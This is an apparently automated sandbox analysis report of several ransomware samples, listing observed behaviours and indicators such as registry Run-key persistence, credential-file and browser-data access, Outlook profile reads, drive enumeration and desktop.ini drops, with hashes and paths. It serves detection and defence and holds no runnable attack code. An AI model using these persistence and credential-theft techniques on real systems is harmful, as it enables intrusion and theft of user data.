Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe -
Loads dropped DLL 8 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exepid process 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe 2276 HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe -
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exeTrojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeTrojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\BrowserUpdateCheck = "C:\\Users\\Admin\\AppData\\Local\\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe" HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\mbuftzcpcrp = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\gcjdhv.exe\"" Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\Desktop\\00381\\Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe\"" Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe = "C:\\Windows\\System32\\Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe" Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\84469962-1738-4351-a4db-3759ea57a846\\Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe\" --AutoStart" Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe -
Drops desktop.ini file(s) 64 IoCs
Processes:
Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeHEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Public\Downloads\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Public\Videos\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2045521122-590294423-3465680274-1000\desktop.ini HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Links\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Public\Music\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Searches\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Public\Desktop\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2045521122-590294423-3465680274-1000\desktop.ini Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\$RECYCLE.BIN\S-1-5-21-2045521122-590294423-3465680274-1000\desktop.ini Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Videos\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Public\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Public\Documents\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Public\Libraries\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2045521122-590294423-3465680274-1000\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Music\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exeTrojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exemsiexec.exedescription ioc process File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\L: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\A: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\F: Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\Q: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\W: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\G: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\X: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\M: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\T: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\N: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\G: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\P: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\H: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\O: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\E: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\B: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\I: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\V: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\U: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe -
Indicator Removal: File Deletion 1 TTPs
